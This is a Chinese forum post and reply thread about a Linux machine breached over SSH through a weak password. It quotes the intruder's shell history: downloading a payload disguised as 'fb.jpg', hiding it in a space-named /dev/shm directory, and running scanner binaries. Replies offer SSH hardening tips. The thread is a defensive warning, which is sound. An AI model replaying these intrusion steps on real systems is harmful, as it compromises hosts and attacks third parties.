刚才突然发现网络出现异常(出现一些异常的流量),遂调用who命令突然发现iraf用户被人通过ssh登录……都怪我一时疏忽大意,居然给iraf 设置了一个那么简单的密码,而且还开了ssh。结果突然就发现了一个95.77.21.239的IP登录了。我一下子意识到,自己是被黑客攻击了。接着我查了ip归属地,居然是罗马尼亚……肯定只是个幌子。根据和某个高手朋友的结果,鉴定出好在这个黑客不是个高手……如果是的话,我的电脑早就要重装了。然后我查看了一下shell的history发现了如下的操作历史
wget cd /tmp chmod +x * ./bash uname -a wget tar cat /etc/issue cd /dev/shm mkdir " " cd " " wget ***; tar zxvf fb.jpg ; rm -rf fb.jpg ; cd fb ; chmod 777 * ; (为了安全起见,我没有贴出链接) ./0-100 196 ./100-200 196 cd /dev/shm w cd " " ls -a cd fb ls -a cat log* ./100-200 196 ls -a cat log* ./0-100 213 cd fb cd /dev/shm ls cat /proc/cpuinfo cd /dev/shm ./0-100 213 cd fb
之后我的iraf用户就出现了无数个ftp_scanner命令……幸好我及时发现……然后把他干的好事逆操作一遍……接着杀掉了所有iraf的进程,删除了iraf用户……目前可能没问题了,前提是如果他的操作只停留在shell层面。在这里提醒大家一定要注意linux用户的密码管理,不能疏忽大意。我的个人案例供警示。
Linux也被Hack提权了?太恐怖了吧……
是我个人的疏忽……
禁用密码认证改用密钥对, 将端口移到非标准的, 同时使用群组进行用户白名单控制, 最后用denyhosts监视闯入者, 做了这4条SSH的安全问题可以降到最低.
恩,以后一定要注意了。
能不能稍微具体点说一下这四个怎么具体操作?
要一一解释就太麻烦了,你哪部分看不懂。
啊,如果那个记录是伪造的呢……
这个没有考虑过啊……如果是伪造的,那就有点太可怕了……
哈哈,好吧,我开玩笑的……
不过,伪造应该很容易……我还是太天真了。